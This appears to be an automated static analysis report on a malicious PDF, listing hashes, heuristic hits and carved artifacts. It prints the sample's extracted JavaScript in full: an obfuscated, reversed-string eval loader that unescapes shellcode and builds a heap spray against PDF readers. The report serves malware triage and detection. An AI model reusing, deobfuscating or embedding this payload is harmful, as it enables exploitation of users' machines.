Malicious PDF — malware analysis report

Static analysis result for SHA-256 8a39be52ae15fb7c…

MALICIOUS

PDF

69.0 KB First seen: 2026-05-10
MD5: 3f4f9313bf4e8a954f9032df0891668b SHA-1: 466f40281a035bc71c48c8e24e7d4845f81b65c3 SHA-256: 8a39be52ae15fb7c716d73beedfc0347a48484f3b08bfec8b02eac30d92d1a9f
68 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 4

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x104F0 3515 bytes
SHA-256: 2e14cb823ebc699a40ae082364874af25770a2b374ffe2f41a0609b8d0d94feb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var eva=new Function("a","ev     al        (a);".split(" ").join(""));
       var s=' ;"s"+3_ozotlav=]i[rra )++i;0f1x0<i;0=i( rof ;)(yarrA wen = rra rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) )"%" ,"Q"(ecalper.)"" ,"P"(ecalper."9214uQ9338uQ5df9uQ9b1euQ4f8fuQ9297uQ7951uQ9082uQ096auQ01dbuQb7acuQb49fuQ90fcuQca1euQ8ff2uQ1916uQ20beuQcc15uQ7565uQ344fuQacefuQcadbuQf19buQba12uQ496duQ2c01uQb847uQ0ce0uQde90uQd3a7uQea34uQ928fuQ4a1auQ47c5uQ2b5cuQ1902uQ3ef1uQ1c93uQ7223uQ17a1uQ0e3buQ8fb9uQa478uQ5e63uQc038uQ8003uQ64f8uQbd6auQ26e6uQf0cfuQf74cuQ3d86uQ4a5buQe2f6uQe464uQdc81uQ6006uQ0c1cuQ73f4uQcfa0uQ6bc7uQ4123uQc3d7uQf11cuQff23uQac29uQfd30uQ0a5buQ49b9uQf0ebuQ59b4uQb740uQ09b8uQ2cb7uQe3cfuQefa7uQ908buQb454uQ053buQ0a71uQ41d4uQda6duQ5228uQ874fuQ9587uQab25uQ5529uQ9325uQ26b9uQ884duQaa49uQbf19uQ7ec7uQ6faduQc682uQ34acuQ7fb5uQ278duQe7ebuQ167auQd7e3uQ56eauQ30c3uQ7531uQ4013uQ387cuQ88f5uQ67c4uQabb6uQ1b33uQ424fuQ9d47uQ339cuQ9d7cuQ0070uQf211uQ0070uQ137duQ0070uQd451uQff09uQffffuQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ0909uQ0909uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ0909uQ0909uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ0909uQff09uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQffffuQ8e6euQ0070uQbb51uQ0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQPbPeP5P0PuPQP5P7PePePuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQPcP0PcP0PuPQPcP0PcP0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP1P8PbPfPuPQP2PcP4P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP4P0P3P8PuPQP3P8P0PcPuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP9P8P8P1PuPQPbP8PaP1PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP5P1P8P5PuPQPaP5PbPePuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP4P5P0P9PuPQPaP5P0P9PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP1P3P7PdPuPQP0P0P0P0PuPQP0P4P0P0PuPQP0P0P0P0PuPQP0P0P0P1PuPQP1P0P0P0PuPQP4P0P1P0PuPQP0P0P0P0PuPQP0P0P0P0PuPQP1P0P0P0PuPQP0P0P1P0PuPQPfPfPfPfPuPQPfPfPfPfPuPQP0P0P7P0PuPQP4P5PcP5PuPQP0P0P7P0PuPQP2PeP2P5PuPQP1P0P0P0PuPQP1P1P0P0PuPQP0P0P7P0PuPQP7PfP2P7PuPQP0P0P7P0PuPQPcPaP8PaPuPQP1P0P0P0PuPQP0P0P1P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQPcPaP8PaPuPQP1P0P0P0PuPQP1P1P0P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2PbPfP7PuPQPePfPfP7PuPQP0P0P3P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQPdP4P5P1PuPQP0P0P0P0PuPQP0P0P0P1PuPQP0P0P7P0PuPQPbPbP5P1PuPQP1P0P0P0PuPQP4P0P1P0PuPQP0P0P7P0PuPQP7PfP2P7PuPQP1P0P0P0PuPQP4P2P1P0PuPQP0P0P7P0PuPQP9P9P5P1PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQPcP0PcP0PuPQPcP0PcP0PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP3P3P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQPcPcPcPcPuPQPcPcPcPcPuPQP0P0P7P0PuPQPfP6P5P1PuPQP0P0P7P0PuPQPfPeP8P4PuPQPcPcPcPcPuPQPcPcPcPcPuPQP0P0P7P0PuPQP9P1P9P4PuPQPcP0PcP0PuPQPcP0PcP0PuPQP" (epak = olygak rav ;epacsenu = epak rav ';
eva(s.split("").reverse().join(""));
font_00_sfnt_off00000319.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x319 65932 bytes
SHA-256: 67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)

Open this report in the interactive analyzer, or submit your own file for analysis.